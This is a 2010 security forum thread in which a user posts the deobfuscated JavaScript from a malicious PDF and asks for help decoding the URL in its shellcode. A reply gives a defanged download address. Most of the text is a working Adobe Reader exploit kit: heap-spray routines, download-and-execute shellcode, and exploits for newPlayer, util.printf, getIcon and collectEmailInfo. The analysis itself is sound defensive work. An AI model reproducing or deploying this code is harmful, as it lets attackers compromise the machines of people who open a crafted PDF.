Author Topic: Wepawet failed to Decode !  (Read 3278 times)


September 29, 2010, 02:02:33 pm

MADY

I received a malicious PDF and tried both automated systems, "wepawet" and "jsunpack". Finally I used "malwaretracker.com" to identify the streams available in the PDF file.


 
function yeqiupve(btiegea)
 
 {
   
   var uaueeuio = '';
   
   var efyliefq = '';
   
   for(tfaeopiul=0;
   tfaeopiul<btiegea.length;
   tfaeopiul++)
   
   {
     
     var aeeoeyu = btiegea.charAt(tfaeopiul);
     
     if(aeeoeyu == uaueeuio)
     {
       
     }
     else
     {
       efyliefq+=aeeoeyu;
       
     }
     
   }
   
   return efyliefq;
   
 }
 
 
 var uxivqia = yeqiupve("\r\n\r\nfunction shcode(url)\r\n
 {
   \r\n\r\nsh = \"%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\";
   \r\nreturn sh+url;
   \r\n
 }
 \r\n\r\nfunction nplayer()
 {
   \r\nfunction kbve()\r\n
   {
     \r\nvar eobe=\"p@111111111111111111111111 : yyyy111\";
     \r\nutil.printd(eobe, ne Date());
     \r\n
   }
   \r\n\r\nvar grix=12000;
   \r\njucobu=ne Array();
   \r\nvar klkng = \"%u9090%u9090\";
   \r\nvar hjnalb8=shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u6E28%u7765%u6C50%u7961%u7265%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\");
   \r\nklkng=unescape(klkng);
   \r\nhjnalb8=unescape(hjnalb8);
   \r\n\r\nhile(klkng.length <= 0x8000)
   {
     klkng+=klkng;
   }
   \r\nklkng=klkng.substr(0,0x8000 - hjnalb8.length);
   \r\nfor(ffam=0;
   ffam<grix;
   ffam++)
   {
     jucobu[ffam]=klkng + hjnalb8;
   }
   \r\nif(grix)
   {
     kbve();
     kbve();
     try
     {
       this.media.nePlayer(null);
     }
     catch(e)
     {
       
     }
     kbve();
   }
   \r\n
 }
 \r\n\r\nfunction printf()
 {
   \r\n\r\nvar payload=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u7028%u6972%u746E%u2966%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
   \r\n\r\nvar nop =\"\";
   \r\nfor (iCnt=128;
   iCnt>=0;
   --iCnt) nop += unescape(\"%u9090%u9090%u9090%u9090%u9090\");
   \r\nheapblock = nop + payload;
   \r\nbigblock = unescape(\"%u9090%u9090\");
   \r\nheadersie = 20;
   \r\nspray = headersie+heapblock.length;
   \r\nhile (bigblock.length<spray) bigblock+=bigblock;
   \r\nfillblock = bigblock.substring(0, spray);
   \r\nblock = bigblock.substring(0, bigblock.length-spray);
   \r\nhile(block.length+spray < 0x40000) block = block+block+fillblock;
   \r\nmem = ne Array();
   \r\nfor (i=0;
   i<1400;
   i++) mem = block + heapblock;
   \r\n\r\nvar num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888\r\nutil.printf(\"%45000f\",num);
   \r\n
 }
 \r\n\r\nfunction geticon()
 {
   \r\n\r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4728%u7465%u6349%u6E6F%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\"));
   \r\n\r\ngarbage = unescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\") + shellcode;
   \r\nnopblock = unescape(\"%u9090%u9090\");
   \r\nheadersie = 10;
   \r\nacl = headersie+garbage.length;
   \r\n\r\nhile (nopblock.length<acl) nopblock+=nopblock;
   \r\nfillblock = nopblock.substring(0, acl);
   \r\nblock = nopblock.substring(0, nopblock.length-acl);
   \r\nhile(block.length+acl<0x40000) block = block+block+fillblock;
   \r\nmemory = ne Array();
   \r\nfor (i=0;
   i<180;
   i++) memory = block + garbage;
   \r\nvar buffersie = 4012;
   \r\nvar buffer = Array(buffersie);
   \r\nfor (i=0;
   i<buffersie;
   i++)\r\n
   {
     \r\nbuffer = unescape(\"%0a%0a%0a%0a\");
     \r\n
   }
   \r\n\r\nCollab.getIcon(buffer+\"_N.bundle\");
   \r\n
 }
 \r\n\r\nfunction collab()
 {
   \r\n\r\nfunction fix_it(yarsp,len)
   {
     \r\nhile(yarsp.length*2<len)
     {
       yarsp+=yarsp;
       
     }
     \r\nyarsp=yarsp.substring(0,len/2);
     \r\nreturn yarsp;
     
   }
   \r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4328%u6C6F%u616C%u2962%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
   \r\nvar mem_array=ne Array();
   \r\nvar cc=0x0c0c0c0c;
   \r\nvar addr=0x400000;
   \r\nvar sc_len=shellcode.length*2;
   \r\nvar len=addr-(sc_len+0x38);
   \r\nvar yarsp=unescape(\"%u9090%u9090\");
   \r\nyarsp=fix_it(yarsp,len);
   \r\nvar count2=(cc-0x400000)/addr;
   \r\nfor(var count=0;
   count<count2;
   count++)
   {
     mem_array[count]=yarsp+shellcode;
     
   }
   \r\nvar overflo=unescape(\"%u0c0c%u0c0c\");
   \r\nhile(overflo.length<44952)
   {
     overflo+=overflo;
     
   }
   \r\nthis.collabStore=Collab.collectEmailInfo(
   {
     subj:\"\",msg:overflo
   }
   );
   \r\n\r\n
 }
 \r\n\r\naPlugins = app.plugIns;
 \r\nvar sv=parseInt(app.vieerVersion.toString().charAt(0));
 \r\nfor (var i=0;
 i < aPlugins.length;
 i++)\r\n
 {
   \r\n    if (aPlugins.name==\"EScript\")\r\n
   {
     \r\n        var lv=aPlugins.version;
     \r\n
   }
   \r\n
 }
 \r\nif ((lv==9)||((sv==8)&&(lv<=8.12)))\r\n
 {
   \r\n    geticon();
   \r\n
 }
 \r\nelse if (lv==7.1)\r\n
 {
   \r\n    printf();
   \r\n
 }
 \r\nelse if (((sv==6)||(sv==7))&&(lv<7.11))\r\n
 {
   \r\n    collab();
   \r\n
 }
 \r\nelse if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))\r\n
 {
   \r\n        nplayer();
   \r\n
 }
 \r\n\r\n");
 
 
 
 loeiize = ''+uxivqia+'';
 
 
 
 var kyvxga = 500;
 
 var egoioany = '';
 
 aruibdoxy0 = loeiize;
 
 for(mauojbqob=0;
 mauojbqob<kyvxga;
 mauojbqob++)
 
 {
   
   var ghsd = mauojbqob+1;
   
   egoioany+='var aruibdoxy'+ghsd+' = aruibdoxy'+mauojbqob+';
   ';
   
   this['ev'+'al'](egoioany);
   
 }
 
 
 
 this['eva'+'l']('this[\'eva\'+\'l\'](aruibdoxy'+kyvxga+');
 ');
 

I believe the shellcode is:


%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\


The "Heap Spray" concept is used here, and I am not sure about the URL passed along with the shellcode. Please help me find out the URL!

Thanks
MAD




 

September 29, 2010, 02:51:08 pm
Reply #1

GmG

hjnalb8=shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u6E28%u7765%u6C50%u7961%u7265%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\");


hxxp://cvbtd.co.cc/vdfg/exe.php?exp=PDF (newPlayer)&key=84d433390bc226e2a8684472db91d892